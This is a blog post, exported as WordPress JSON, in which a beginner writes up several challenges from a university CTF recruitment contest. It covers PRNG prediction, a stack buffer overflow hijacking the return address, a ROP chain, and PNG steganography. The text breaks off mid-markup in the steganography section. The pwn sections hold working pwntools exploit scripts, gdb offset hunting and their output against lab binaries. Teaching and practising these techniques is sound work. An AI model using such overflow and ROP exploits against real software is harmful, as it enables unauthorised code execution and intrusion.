{"id":1473,"date":"2020-05-05T01:40:15","date_gmt":"2020-05-04T17:40:15","guid":{"rendered":"https:\/\/cf.mnihyc.com\/blog\/?p=1473"},"modified":"2020-05-05T17:46:43","modified_gmt":"2020-05-05T09:46:43","slug":"%e8%8f%9c%e9%b8%a1%e9%a6%96%e5%8f%91-ctf-%e9%83%a8%e5%88%86-writeup-%e5%ad%a6%e4%b9%a0%e7%bb%8f%e9%aa%8c","status":"publish","type":"post","link":"https:\/\/cf.mnihyc.com\/blog\/archives\/1473","title":{"rendered":"A Newbie's First CTF || Partial WriteUp &#038; Lessons Learned"},"content":{"rendered":"<p>Thanks to the far-reaching <strong>connections<\/strong> of my <em>group-chat friends<\/em> (), I slipped into the <span style=\"text-decoration: underline;\">recruitment<\/span> contest of HIT's CTF team and picked up a lot of tricks and pwn experience, so I am writing them down here.<\/p>\n<p>This is a newbie's first CTF, and the challenges are fairly easy<del>, and I still did not solve them all<\/del>, so experts may want to skip this post (<\/p>\n<p><span style=\"color: #ffffff;\">Also %%%%%% rxz mcfx<\/span><\/p>\n<p>&nbsp;<\/p>\n<hr \/>\n<p>&nbsp;<\/p>\n<p><!--more--><\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li>\n<h3><strong>Contents<\/strong><\/h3>\n<ul>\n<li><a href=\"#t_pre\"><strong>Environment setup<\/strong><\/a><\/li>\n<li>pwn &#8211; <strong><a href=\"#t_game\">game<\/a><\/strong><\/li>\n<li>pwn &#8211; <a href=\"#t_pwn-1-3-1\"><strong>pwn-1-3-1<\/strong><\/a><\/li>\n<li>pwn &#8211; <a href=\"#t_pwn-1-3-1-1\"><strong>pwn-1-3-1-1<\/strong><\/a><\/li>\n<li>misc &#8211; <a href=\"#t_yankee_with_no_brim\"><strong>Yankee with no brim<\/strong><\/a><\/li>\n<li>crypto &#8211; <a href=\"#t_base64\"><strong>\u7533\u5fc5base64<\/strong><\/a><\/li>\n<li>crypto &#8211; <a href=\"#t_rsa-1\"><strong>RSA-1<\/strong><\/a><\/li>\n<li><a 
href=\"#t_end\"><strong>Closing remarks<\/strong><\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>All of the programs above can be downloaded from <span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/ctf1pack.zip\">ctf1pack<\/a><\/span>.<\/p>\n<p><a id=\"t_pre\"><\/a>\u00a0<\/p>\n<hr \/>\n<ul>\n<li>\n<h3><strong>Environment setup<\/strong><\/h3>\n<\/li>\n<\/ul>\n<p>First we need a Windows machine (to run tools such as <a href=\"https:\/\/dl.mnihyc.com\/Tools\/IDA\"><span style=\"color: #0000ff;\">IDA<\/span><\/a> and <a href=\"https:\/\/dl.mnihyc.com\/Tools\/010EditorPortable.zip\"><span style=\"color: #0000ff;\">010Editor<\/span><\/a>) and a Linux machine (for writing scripts). I use Windows10 x64 + Ubuntu 18.04 amd64.<\/p>\n<p>Next we install some handy tools on Ubuntu, starting with python3, which is a must.<\/p>\n<pre class=\"lang:default decode:true\">sudo apt install python3 python3-pip\r\npython3 -m pip install --upgrade pip<\/pre>\n<p>Then install the all-purpose pwntools:<\/p>\n<pre class=\"lang:default decode:true\">python3 -m pip install --upgrade git+https:\/\/github.com\/Gallopsled\/pwntools.git@dev3<\/pre>\n<p>Then the debugging powerhouse gdb-peda:<\/p>\n<pre class=\"lang:default decode:true \">sudo apt install gdb\r\ngit clone https:\/\/github.com\/longld\/peda.git ~\/peda\r\necho \"source ~\/peda\/peda.py\" &gt;&gt; ~\/.gdbinit<\/pre>\n<p>Next, install ROPgadget:<\/p>\n<pre class=\"lang:default decode:true\">cd \/tmp\r\n# Check and download the latest version by yourself\r\nwget https:\/\/github.com\/JonathanSalwan\/ROPgadget\/archive\/v6.3.zip\r\nunzip 
v6.3.zip\r\nsudo python3 ROPgadget-6.3\/setup.py install\r\n# The installation failed for me, so I needed to copy files manually\r\nsudo cp -r ROPgadget-6.3\/scripts \/home\/mnihyc\/.local\/lib\/python3.6\/site-packages\/ROPGadget-6.3.dist-info\/<\/pre>\n<p>Continue with binwalk and foremost:<\/p>\n<pre class=\"lang:default decode:true \">cd \/tmp\r\ngit clone https:\/\/github.com\/ReFirmLabs\/binwalk\r\ncd binwalk\r\nsudo python3 setup.py install\r\n\r\nsudo apt install foremost<\/pre>\n<p>Finally, install requests and gmpy2 (pycryptodome):<\/p>\n<pre class=\"lang:default decode:true \">pip3 install requests\r\npip3 install pycryptodome<\/pre>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a id=\"t_game\"><\/a>\u00a0<\/p>\n<hr \/>\n<ul>\n<li>\n<h3><strong>pwn &#8211; game<\/strong><\/h3>\n<\/li>\n<\/ul>\n<p><span class=\"challenge-desc\">Play Rock, Paper, Scissors and win 100 times to get the flag.<br \/>\n<\/span><\/p>\n<pre class=\"lang:default decode:true\" title=\"game.c\">#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n#include &lt;time.h&gt;\r\n\r\nvoid printWelcomeMsg() {\r\n    puts(\"Are you good at the game `Rock, Paper, Scissors`?\");\r\n    puts(\"I'm going to play the game 100 times with you, and only if you win 100 times, I will give you the flag.\");\r\n    puts(\"That's quite easy, isn't it?\");\r\n    puts(\"\");\r\n    puts(\"input: 0 = Rock, 1 = Paper, 2 = Scissors\");\r\n    fflush(stdout);\r\n}\r\n\r\nvoid printFlag() {\r\n    puts(getenv(\"flag\"));\r\n    fflush(stdout);\r\n}\r\n\r\nint getInput() {\r\n    char s[100];\r\n    scanf(\"%s\", s);\r\n    char ch = s[0];\r\n\r\n    if(ch &lt; '0' || ch &gt; '2') {\r\n        puts(\"Oh, input is invalid.\");\r\n        exit(1);\r\n    }\r\n\r\n    return ch - '0';\r\n}\r\n\r\n\/\/ rand() behaves differently on Linux and on Windows.\r\n\/\/ 
To avoid tripping up contestants, we wrote our own rand.\r\n\r\nint num = 0;\r\n\r\nint myRand() {\r\n    num = (num * num + 233) % 23333;\r\n    return num;\r\n}\r\n\r\nvoid mySrand(unsigned int seed) {\r\n    num = seed;\r\n}\r\n\r\nint playOnce() {\r\n    printf(\"Input your choice&gt; \");\r\n    fflush(stdout);\r\n\r\n    int ai = myRand() % 3;\r\n    int player = getInput();\r\n\r\n    if(player == 1 &amp;&amp; ai == 0)\r\n        return 1;\r\n    if(player == 2 &amp;&amp; ai == 1)\r\n        return 1;\r\n    if(player == 0 &amp;&amp; ai == 2)\r\n        return 1;\r\n    \r\n    return 0;\r\n}\r\n\r\nvoid work() {\r\n    mySrand(time(0) % 10);\r\n\r\n    for(int x=0; x&lt;100; x++)\r\n        if(playOnce()) {\r\n            printf(\"nice try (%d\/100)\\n\", x+1);\r\n            fflush(stdout);\r\n        }\r\n        else {\r\n            puts(\"Oh no... You failed.\");\r\n            fflush(stdout);\r\n            exit(0);\r\n        }\r\n    \r\n    printFlag();\r\n}\r\n\r\nint main(void) {\r\n    printWelcomeMsg();\r\n\r\n    work();\r\n\r\n    return 0;\r\n}\r\n<\/pre>\n<p>Reading the source, the seed is time(0)%10, so as long as we obtain the same time value, every \"random\" number generated afterwards can be computed.<\/p>\n<p>That lets us win all 100 rounds reliably.<\/p>\n<p>Writing yet another C++ program to do this would be maddening, though; this is where python3 + pwntools is the perfect match!<\/p>\n<pre class=\"lang:default decode:true\">from pwn import *\r\nimport time\r\nprint(time.time())\r\nc=remote('xxx.xxx.xxx.xxx',30003)\r\n# Same seed as the server's time(0) % 10 (time.time() is already in seconds)\r\nnum=int(time.time())%10\r\nfor i in range(0,100):\r\n    # Replay myRand() and answer with the move that beats the server's choice\r\n    num = (num * num + 233) % 23333\r\n    ai=num%3\r\n    if ai==0:\r\n        c.sendline(b'1')\r\n    elif 
ai==1:\r\n        c.sendline(b'2')\r\n    else:\r\n        c.sendline(b'0')\r\n    print(c.recvline())\r\nc.interactive()\r\n<\/pre>\n<p>A few short lines later, we have the flag:<\/p>\n<pre class=\"lang:default decode:true\">mnihyc@mnihyc:\/tmp$ python3 120.py\r\n1588437515.9302742\r\n[+] Opening connection to xxx.xxx.xxx.xxx on port 30003: Done\r\nb'Are you good at the game `Rock, Paper, Scissors`?\\n'\r\nb\"I'm going to play the game 100 times with you, and only if you win 100 times, I will give you the flag.\\n\"\r\nb\"That's quite easy, isn't it?\\n\"\r\nb'\\n'\r\nb'input: 0 = Rock, 1 = Paper, 2 = Scissors\\n'\r\nb'Input your choice&gt; nice try (1\/100)\\n'\r\nb'Input your choice&gt; nice try (2\/100)\\n'\r\nb'Input your choice&gt; nice try (3\/100)\\n'\r\nb'Input your choice&gt; nice try (4\/100)\\n'\r\nb'Input your choice&gt; nice try (5\/100)\\n'\r\nb'Input your choice&gt; nice try (6\/100)\\n'\r\nb'Input your choice&gt; nice try (7\/100)\\n'\r\nb'Input your choice&gt; nice try (8\/100)\\n'\r\n(middle omitted)\r\nb'Input your choice&gt; nice try (95\/100)\\n'\r\n[*] Switching to interactive mode\r\nInput your choice&gt; nice try (96\/100)\r\nInput your choice&gt; nice try (97\/100)\r\nInput your choice&gt; nice try (98\/100)\r\nInput your choice&gt; nice try (99\/100)\r\nInput your choice&gt; nice try (100\/100)\r\nflag{pwntools_is_so_useful}\r\n[*] Got EOF while reading in interactive\r\n<\/pre>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a id=\"t_pwn-1-3-1\"><\/a>\u00a0<\/p>\n<hr \/>\n<ul>\n<li>\n<h3><strong>pwn &#8211; pwn-1-3-1<\/strong><\/h3>\n<\/li>\n<\/ul>\n<p>We are given a single LSB executable; open IDA and drop it in.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1481\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TMESFQL98IO3L1A7H.png\" alt=\"\" width=\"500\" height=\"216\" 
srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TMESFQL98IO3L1A7H.png 500w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TMESFQL98IO3L1A7H-300x130.png 300w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TMESFQL98IO3L1A7H-150x65.png 150w\" sizes=\"auto, (max-width: 500px) 100vw, 500px\" \/><\/p>\n<p>buf is only 256 bytes, yet read pulls in 0x200uLL bytes in one call: a textbook buffer overflow.<\/p>\n<p>The function list also contains get_flag(); press F5 to decompile it.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1482\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/RLZATZZ3Q7RHY5GWZC.png\" alt=\"\" width=\"352\" height=\"223\" srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/RLZATZZ3Q7RHY5GWZC.png 352w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/RLZATZZ3Q7RHY5GWZC-300x190.png 300w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/RLZATZZ3Q7RHY5GWZC-150x95.png 150w\" sizes=\"auto, (max-width: 352px) 100vw, 352px\" \/><\/p>\n<p>In other words, steering execution into get_flag() is enough to get the flag.<\/p>\n<p>Use checksec or a similar tool to inspect the binary:<\/p>\n<pre class=\"lang:default decode:true\">mnihyc@mnihyc:\/tmp$ python3 -c 'from pwn import *; ELF(\"pwn-1-3-1\");'\r\n[*] '\/tmp\/pwn-1-3-1'\r\n    Arch:     amd64-64-little\r\n    RELRO:    Partial RELRO\r\n    Stack:    No canary found\r\n    NX:       NX enabled\r\n    PIE:      No PIE (0x400000)\r\n<\/pre>\n<p>NX (DEP) is enabled, so shellcode cannot be injected; we use a ROP-style approach instead.<\/p>\n<p>PIE is also not enabled (non-ASLR), so a function address can be written in directly.<\/p>\n<p>Find the exported function's address in IDA:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1483\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/4U6HZE6FGXS6ITAC9ZL5.png\" alt=\"\" width=\"625\" height=\"108\" srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/4U6HZE6FGXS6ITAC9ZL5.png 625w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/4U6HZE6FGXS6ITAC9ZL5-300x52.png 300w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/4U6HZE6FGXS6ITAC9ZL5-150x26.png 150w\" sizes=\"auto, (max-width: 625px) 100vw, 625px\" \/><\/p>\n<p>Then use gdb-peda to find the number of bytes needed for the overflow to reach $RSP (which, at the moment of the overflow, points at the value that becomes $RIP):<\/p>\n<pre class=\"lang:default decode:true\">mnihyc@proxy4:\/tmp$ gdb\r\nGNU gdb (Ubuntu 8.1-0ubuntu3.2) 8.1.0.20180409-git\r\ngdb-peda$ pattern_create 400 in.txt\r\nWriting pattern of 400 chars to filename \"in.txt\"\r\ngdb-peda$ file pwn-1-3-1\r\nReading symbols from pwn-1-3-1...done.\r\ngdb-peda$ r &lt; in.txt\r\nStarting program: \/tmp\/pwn-1-3-1 &lt; in.txt\r\n\u8bf7\u5f00\u59cb\u4f60\u7684\u8868\u6f14:\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n[----------------------------------registers-----------------------------------]\r\nRAX: 0x0\r\nRBX: 0x0\r\nRCX: 0x15555504b081 (&lt;__GI___libc_read+17&gt;:     cmp    rax,0xfffffffffffff000)\r\nRDX: 0x200\r\nRSI: 0x7fffffffe360 (\"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA\"...)\r\nRDI: 0x0\r\nRBP: 0x3425416525414925 ('%IA%eA%4')\r\nRSP: 0x7fffffffe478 
(\"A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y\")\r\nRIP: 0x4007fa (&lt;main+99&gt;:       ret)\r\nR8 : 0x16\r\nR9 : 0x1555555474c0 (0x00001555555474c0)\r\nR10: 0x3\r\nR11: 0x246\r\nR12: 0x400610 (&lt;_start&gt;:        xor    ebp,ebp)\r\nR13: 0x7fffffffe550 --&gt; 0x1\r\nR14: 0x0\r\nR15: 0x0\r\nEFLAGS: 0x10207 (CARRY PARITY adjust zero sign trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n   0x4007ef &lt;main+88&gt;:  call   0x4005c0 &lt;read@plt&gt;\r\n   0x4007f4 &lt;main+93&gt;:  mov    eax,0x0\r\n   0x4007f9 &lt;main+98&gt;:  leave\r\n=&gt; 0x4007fa &lt;main+99&gt;:  ret\r\n   0x4007fb:    nop    DWORD PTR [rax+rax*1+0x0]\r\n   0x400800 &lt;__libc_csu_init&gt;:  push   r15\r\n   0x400802 &lt;__libc_csu_init+2&gt;:        push   r14\r\n   0x400804 &lt;__libc_csu_init+4&gt;:        mov    r15d,edi\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0x7fffffffe478 (\"A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y\")\r\n0008| 0x7fffffffe480 (\"5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y\")\r\n0016| 0x7fffffffe488 (\"%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y\")\r\n0024| 0x7fffffffe490 (\"A%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y\")\r\n0032| 0x7fffffffe498 (\"iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y\")\r\n0040| 0x7fffffffe4a0 (\"%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y\")\r\n0048| 0x7fffffffe4a8 (\"A%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y\")\r\n0056| 0x7fffffffe4b0 
(\"lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y\")\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\nStopped reason: SIGSEGV\r\n0x00000000004007fa in main () at pwn5.c:32\r\n32      pwn5.c: No such file or directory.\r\ngdb-peda$ x\/wx $rsp\r\n0x7fffffffe478: 0x414a2541\r\ngdb-peda$ pattern offset 0x414a2541\r\n1095378241 found at offset: 280\r\ngdb-peda$\r\n<\/pre>\n<p>So we simply overwrite the value at $RSP (the future $RIP) with the address of get_flag(), and the flag is ours!<\/p>\n<pre class=\"lang:default decode:true \">from pwn import *\r\n\r\nc=remote('xxx.xxx.xxx.xxx',4005)\r\n# 280 bytes of padding (the offset found above), then the address of get_flag()\r\np=b'C'*280 + p64(0x0000000000400728)\r\nc.recvline()\r\nc.sendline(p)\r\nc.interactive()\r\n<\/pre>\n<pre class=\"lang:default decode:true\">mnihyc@mnihyc:\/tmp$ python3 4005.py\r\n[+] Opening connection to xxx.xxx.xxx.xxx on port 4005: Done\r\n[*] Switching to interactive mode\r\nncongrats, here is the flag\r\nflag{It_1s_amazing_to_overwrite_return_address}\r\ntql!!!\r\n[*] Got EOF while reading in interactive<\/pre>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a id=\"t_pwn-1-3-1-1\"><\/a>\u00a0<\/p>\n<hr \/>\n<ul>\n<li>\n<h3><strong>pwn &#8211; pwn-1-3-1-1<\/strong><\/h3>\n<\/li>\n<\/ul>\n<p>Likewise, we get an ELF 64-bit LSB executable; load it straight into IDA and press F5.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1486\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/0XCF2VOI8UPEXWP.png\" alt=\"\" width=\"500\" height=\"219\" srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/0XCF2VOI8UPEXWP.png 500w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/0XCF2VOI8UPEXWP-300x131.png 300w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/0XCF2VOI8UPEXWP-150x66.png 150w\" sizes=\"auto, (max-width: 500px) 100vw, 500px\" 
\/><\/p>\n<p>This main() looks about the same, so again we step into get_flag().<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1487\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/1UDXO@ALB@BI@OLT2.png\" alt=\"\" width=\"353\" height=\"245\" srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/1UDXO@ALB@BI@OLT2.png 353w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/1UDXO@ALB@BI@OLT2-300x208.png 300w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/1UDXO@ALB@BI@OLT2-150x104.png 150w\" sizes=\"auto, (max-width: 353px) 100vw, 353px\" \/><\/p>\n<p>The function now takes a parameter, and it also has to pass the validate() check.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1488\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/QND5ZCTL7O2TAA12O.png\" alt=\"\" width=\"326\" height=\"92\" srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/QND5ZCTL7O2TAA12O.png 326w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/QND5ZCTL7O2TAA12O-300x85.png 300w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/QND5ZCTL7O2TAA12O-150x42.png 150w\" sizes=\"auto, (max-width: 326px) 100vw, 326px\" \/><\/p>\n<p>However, this check is effectively useless ((, because the flag we want is at .\/flag.<\/p>\n<p>So the question now is how to make the program execute get_flag() with the argument path=&quot;.\/flag&quot;?<\/p>\n<p>Note that on x86, function arguments are passed entirely on the stack, pushed from right to left, whereas on amd64 arguments go first into the six registers $RDI, $RSI, $RDX, $RCX, $R8 and $R9, and the stack is used only once those are full.<\/p>\n<p>So controlling path, the first parameter of get_flag(), means controlling $RDI.<\/p>\n<p>Use ROPgadget to look for a pop rdi; ret sequence to serve as the gadget.<\/p>\n<pre class=\"lang:default decode:true\">mnihyc@mnihyc:\/tmp$ ROPgadget --binary .\/pwn-1-3-1-1 --only \"pop|ret\"\r\nGadgets information\r\n============================================================\r\n0x00000000004008fc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret\r\n0x00000000004008fe : pop r13 ; pop r14 ; pop r15 ; ret\r\n0x0000000000400900 : pop r14 ; pop r15 ; ret\r\n0x0000000000400902 : pop r15 ; ret\r\n0x00000000004008fb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret\r\n0x00000000004008ff : pop rbp ; pop r14 ; pop r15 ; ret\r\n0x00000000004006b0 : pop rbp ; ret\r\n0x0000000000400903 : pop rdi ; ret\r\n0x0000000000400901 : pop rsi ; pop r15 ; ret\r\n0x00000000004008fd : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret\r\n0x00000000004005a9 : ret\r\n\r\nUnique gadgets found: 11\r\n<\/pre>\n<p>We find pop rdi; ret at 0x0000000000400903.<\/p>\n<p>Note that pop rdi only pops the address of a string from the stack into $RDI, so we need a memory region that holds the string &quot;.\/flag&quot;.<\/p>\n<p>Fortunately, the binary already contains this string:<\/p>\n<pre class=\"lang:default decode:true\">mnihyc@mnihyc:\/tmp$ python3 -c 'from pwn import *; e=ELF(\"pwn-1-3-1-1\"); \\\r\nprint(\"%x\"%next(e.search(b\".\/flag\")))'\r\n[*] '\/tmp\/pwn-1-3-1-1'\r\n    Arch:     amd64-64-little\r\n    
RELRO:    Partial RELRO\r\n    Stack:    No canary found\r\n    NX:       NX enabled\r\n    PIE:      No PIE (0x400000)\r\n40093e\r\n<\/pre>\n<p>After the ret, $RSP moves up from the saved $RIP (overwritten with the address of pop rdi; ret); executing the pop moves it up again to the new $RIP (overwritten with the address of get_flag()), and the following ret then jumps there.<\/p>\n<p>Finally, find the overflow offset the same way as in pwn-1-3-1, and the exploit can be built:<\/p>\n<pre class=\"lang:default decode:true \">from pwn import *\r\nc=remote('xxx.xxx.xxx.xxx',4006)\r\nc.recvline()\r\ne=ELF('pwn-1-3-1-1')\r\nfuncaddr=e.symbols['get_flag']\r\nflagaddr=next(e.search(b'.\/flag'))\r\n# pop rdi ; ret (from the ROPgadget output)\r\npopaddr=0x0000000000400903\r\n# padding up to the return address, then: gadget, value popped into rdi, get_flag()\r\npayload = b'C'*280 + p64(popaddr) + p64(flagaddr) + p64(funcaddr)\r\nc.sendline(payload)\r\nc.interactive()\r\n<\/pre>\n<pre class=\"lang:default decode:true\">mnihyc@mnihyc:\/tmp$ python3 rop.py\r\n[+] Opening connection to xxx.xxx.xxx.xxx on port 4006: Done\r\n[*] '\/tmp\/pwn-1-3-1-1'\r\n    Arch:     amd64-64-little\r\n    RELRO:    Partial RELRO\r\n    Stack:    No canary found\r\n    NX:       NX enabled\r\n    PIE:      No PIE (0x400000)\r\n[*] Switching to interactive mode\r\nflag{ROP_is_really_rea11y_useful!!}\r\nbye bye\r\n[*] Got EOF while reading in interactive\r\n<\/pre>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a id=\"t_yankee_with_no_brim\"><\/a>\u00a0<\/p>\n<hr \/>\n<ul>\n<li>\n<h3><strong>misc &#8211; Yankee with no brim<\/strong><\/h3>\n<\/li>\n<\/ul>\n<p>We are handed this image:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1489\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/3AATM7UQ61MZWO39EN.png\" alt=\"\" width=\"608\" height=\"33\" 
srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/3AATM7UQ61MZWO39EN.png 608w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/3AATM7UQ61MZWO39EN-300x16.png 300w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/3AATM7UQ61MZWO39EN-150x8.png 150w\" sizes=\"auto, (max-width: 608px) 100vw, 608px\" \/><\/p>\n<p>I tried StegSolve to look for LSB steganography and searched for unusual strings, both without result.<\/p>\n<p>So use binwalk to look for embedded file headers:<\/p>\n<pre class=\"lang:default decode:true \">mnihyc@mnihyc:\/tmp$ binwalk ywnb.jpg\r\n\r\nDECIMAL       HEXADECIMAL     DESCRIPTION\r\n--------------------------------------------------------------------------------\r\n0             0x0             JPEG image data, JFIF standard 1.01\r\n7596          0x1DAC          PNG image, 600 x 500, 8-bit\/color RGBA, non-interlaced\r\n7687          0x1E07          Zlib compressed data, compressed\r\n\r\n<\/pre>\n<p>A PNG is hidden inside, so extract it with foremost:<\/p>\n<pre class=\"lang:default decode:true \">File: ywnb.jpg\r\nStart: Sun May  3 08:11:42 2020\r\nLength: 198 KB (203497 bytes)\r\n\r\nNum      Name (bs=512)         Size      File Offset     Comment\r\n\r\n0:      00000000.jpg           7 KB               0\r\n1:      00000014.png         191 KB            7596       (600 x 500)\r\nFinish: Sun May  3 08:11:42 2020\r\n\r\n2 FILES EXTRACTED\r\n\r\njpg:= 1\r\npng:= 1\r\n<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1490\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/@F9S@7DQ8J72FHGT401U.png\" alt=\"\" width=\"612\" height=\"27\" srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/@F9S@7DQ8J72FHGT401U.png 612w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/@F9S@7DQ8J72FHGT401U-300x13.png 300w, 
https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/@F9S@7DQ8J72FHGT401U-150x7.png 150w\" sizes=\"auto, (max-width: 612px) 100vw, 612px\" \/><\/p>\n<p>Yet opening this PNG shows nothing special either (Windows victim here).<\/p>\n<p>After searching online (outside help, lol), I found that text can be hidden by altering a PNG image's width\/height; viewing such a file on Linux produces an error.<\/p>\n<p>Open the PNG in 010Editor, parse its structure, and increase the number representing height by some arbitrary amount:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1491\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/3RR48DHJRM02N@JXDEXN.png\" alt=\"\" width=\"723\" height=\"597\" srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/3RR48DHJRM02N@JXDEXN.png 723w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/3RR48DHJRM02N@JXDEXN-300x248.png 300w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/3RR48DHJRM02N@JXDEXN-150x124.png 150w\" sizes=\"auto, (max-width: 723px) 100vw, 723px\" \/><\/p>\n<p>And the flag appears:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1492\" src=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/1GF@L0FPQX8G13QD9V76.png\" alt=\"\" width=\"440\" height=\"547\" srcset=\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/1GF@L0FPQX8G13QD9V76.png 440w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/1GF@L0FPQX8G13QD9V76-241x300.png 241w, https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/1GF@L0FPQX8G13QD9V76-121x150.png 121w\" sizes=\"auto, (max-width: 440px) 100vw, 440px\" 
